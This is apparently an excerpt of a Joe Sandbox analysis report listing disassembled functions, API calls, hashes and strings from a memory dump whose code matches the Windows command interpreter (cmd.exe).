                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                                                    • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                                                    • API String ID: 511550188-726566285
                                                                                                                    • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                                    • Instruction ID: 5fb2a1cf58922f3949d909df9ed16affeaffed46278799c3cb35bc794d6bdc6d
                                                                                                                    • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                                    • Instruction Fuzzy Hash: 8052B022A0C69AC6EB64AF25A404279FEB1FB85F96FE44135D94E43794DF3CE844C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC9E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmp$wcschr$wcstol
                                                                                                                    • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                                                    • API String ID: 1738779099-3004636944
                                                                                                                    • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                                    • Instruction ID: 6d66c87ee4713a03e26954df98a41873dc93a74a729a1ec9a6238ddf7e6bde0e
                                                                                                                    • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                                    • Instruction Fuzzy Hash: 51729131F0865A8AEB50AF65D4442BDBBB1FB44F9AFA18035DE0D57794EE3CA845C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE7F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7F44
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE7F5C
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7F9E
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7FFF
                                                                                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8020
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8036
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8061
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8075
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE80D6
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE80EA
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE8177
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE819A
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81BD
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81DC
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81FB
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE821A
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE8239
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8291
                                                                                                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE82D7
                                                                                                                    • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE82FB
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE831A
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8364
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8378
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE839A
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE83AE
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE83E6
                                                                                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8403
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8418
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                    • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                    • API String ID: 3637805771-3100821235
                                                                                                                    • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                    • Instruction ID: 95a809d78b5f4528f460f3fc67a900cbc97e4ce3cb9e141c7831a23fb608451d
                                                                                                                    • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                    • Instruction Fuzzy Hash: 56E16C31A08A5A8AE710AF65A40417DFEB5FB49F96BE58234DD1E53790EF3CE444C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC3F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                                                    • String ID: %s$%s
                                                                                                                    • API String ID: 3623545644-3518022669
                                                                                                                    • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                                                    • Instruction ID: c96d18a2deac3f4d273b58a4d51c3d1ce05af7dbc234b6fa8ff133a95055b244
                                                                                                                    • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                                                    • Instruction Fuzzy Hash: 2BD2C731B0868A8AEB64AF61D4402BDBBB5FB45F5AFA04139DA0E47B95DF3CE504C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC2C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                                                    • String ID: %9d$%s
                                                                                                                    • API String ID: 4286035211-3662383364
                                                                                                                    • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                                                    • Instruction ID: 5c9691b593a62c556ac3087bd5ac4c2a5e9a86ea0d48ee6cc46ee0495161f2f0
                                                                                                                    • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                                                    • Instruction Fuzzy Hash: 3A529532A087868AEB64AF64D8502FDBBB4FB85B9AFA04135DA0E47794DF3CD544C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD18D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcsrchr$towlower
                                                                                                                    • String ID: fdpnxsatz
                                                                                                                    • API String ID: 3267374428-1106894203
                                                                                                                    • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                                                    • Instruction ID: 2cb84c67287c8cbfbb5bc477a36bed1d0ae4ebf5f180dc331f87089aebb32f32
                                                                                                                    • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                                                    • Instruction Fuzzy Hash: 4F42B321B0968A86EB68AF2595182B9BFB1FF45F96FA44135DE4E07B84DF3CE441C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC7650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                                    • String ID: DPATH
                                                                                                                    • API String ID: 95024817-2010427443
                                                                                                                    • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                    • Instruction ID: f7e17d679d89f1c2506fcc1769d496c6e4458abb0e943576203c2e3d1857801c
                                                                                                                    • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                    • Instruction Fuzzy Hash: AB12B632A086868AE764AF21944017DFFB5FB89FA6FA45135EA4E57794DF3CE400CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC5240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                    • API String ID: 0-1980097535
                                                                                                                    • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                                                    • Instruction ID: 6a43b09af20fded4de7a7ef429f9e8fa3e838a705e8161d42e4cb41c1c8c191f
                                                                                                                    • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                                                    • Instruction Fuzzy Hash: FE32BF32A0868A86EB20EF61D4442FDBBB4FB45F9AFA14135DA4D07695EF3CE505C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC6EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
                                                                                                                    • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                    • API String ID: 4111365348-3662956551
                                                                                                                    • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                    • Instruction ID: 938af7d0400e29b397411a3fa9f50ead7eebe23b0e677e4df856d82e3caf15e8
                                                                                                                    • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                    • Instruction Fuzzy Hash: 3CE1AE21A0864A86EB50AF65A8445BDFFB1FF84FAAFE44131D90E47695EE3CE504C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEEE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcsupr.MSVCRT ref: 00007FF789BEEF33
                                                                                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEF98
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFA9
                                                                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFBF
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF789BEEFDC
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFED
                                                                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF003
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF022
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF083
                                                                                                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF092
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF0A5
                                                                                                                    • towupper.MSVCRT ref: 00007FF789BEF0DB
                                                                                                                    • wcschr.MSVCRT ref: 00007FF789BEF135
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF16C
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF185
                                                                                                                      • Part of subcall function 00007FF789BD01B8: _get_osfhandle.MSVCRT ref: 00007FF789BD01C4
                                                                                                                      • Part of subcall function 00007FF789BD01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD01D6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                    • String ID: <noalias>$CMD.EXE
                                                                                                                    • API String ID: 1161012917-1690691951
                                                                                                                    • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                    • Instruction ID: 522d4477c7e668436f625e1f33634c0789cca3cf7043065c4db2181d243407ee
                                                                                                                    • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                    • Instruction Fuzzy Hash: D9919E21B0965A8AFB14AF60E8101BDAEB4BF49F96FA48135DD0E52695EF3CE445C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

